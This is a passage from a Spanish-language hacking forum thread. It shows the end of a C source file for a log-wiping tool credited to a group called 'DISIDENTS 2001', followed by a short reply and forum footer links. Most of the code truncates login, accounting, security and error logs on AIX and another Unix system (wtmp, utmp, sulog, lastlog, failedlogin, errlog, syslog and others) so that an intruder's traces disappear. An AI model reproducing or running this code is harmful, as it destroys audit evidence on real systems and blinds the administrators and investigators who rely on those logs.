system("cat /dev/null  >  /var/adm/acct/sum/loginlog ");
system("echo eliminando /var/adm/X0msgs ");
system("cat /dev/null  >  /var/adm/X0msgs ");
system("echo eliminando /var/adm/crash/vmcore ");
system("cat /dev/null  >  /var/adm/crash/vmcore ");
system("echo eliminando /var/adm/crash/unix ");
system("cat /dev/null  >  /var/adm/crash/unix");
break;
case '4':
system("echo eliminando logs de sistema AIX (IBM)");
system("echo eliminando /var/adm/pacct ");
system("cat /dev/null  >  /var/adm/pacct ");
system("echo eliminando /var/adm/wtmp ");
system("cat /dev/null  >  /var/adm/wtmp ");
system("echo eliminando /var/adm/dtmp ");
system("cat /dev/null  >  /var/adm/dtmp ");
system("echo eliminando /var/adm/qacct ");
system("cat /dev/null  >  /var/adm/qacct ");
system("echo eliminando /var/adm/sulog ");
system("cat /dev/null  >  /var/adm/sulog ");
system("echo eliminando /var/adm/ras/errlog ");
system("cat /dev/null  >  /var/adm/ras/errlog ");
system("echo eliminando /var/adm/ras/bootlog ");
system("cat /dev/null  > /var/adm/ras/bootlog  ");
system("echo eliminando /var/adm/cron/log  ");
system("cat /dev/null  >  /var/adm/cron/log ");
system("echo eliminando /etc/utmp ");
system("cat /dev/null  >  /etc/utmp ");
system("echo eliminando /etc/security/lastlog ");
system("cat /dev/null  > /etc/security/lastlog  ");
system("echo eliminando /etc/security/failedlogin ");
system("cat /dev/null  > /etc/security/failedlogin  ");
system("echo eliminando /usr/spool/mqueue/syslog ");
system("cat /dev/null  >  /usr/spool/mqueue/syslog ");
break;
case '5':
system ("clear");
printf("\n\033[1;30m  \n");
printf("                    ---------  ------- ----------------\n");
printf("       --------------------   -------   ----------------------\n");
printf(" -----------------------               -------------------------\n");
printf("-------------------------          ------------------------------\n");
printf(" ----------------                             ------------------\n");
printf("    ----------------------------------------------------\n");
printf("           ------------------------------------\n");
printf("\n\033[1;31mDISIDENTS 2001 - LOS FUERA DE LA LEY\033[0;0m\n");
return 0;
}
}

-------------------------fin del codigo fuente----------------


En línea

uh ah.. pone a franchela..

xD
Páginas: [1] 2 Ir Arriba Imprimir 
Ir a:  







Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.6 | SMF © 2006-2008, Simple Machines LLC
Free counter and web stats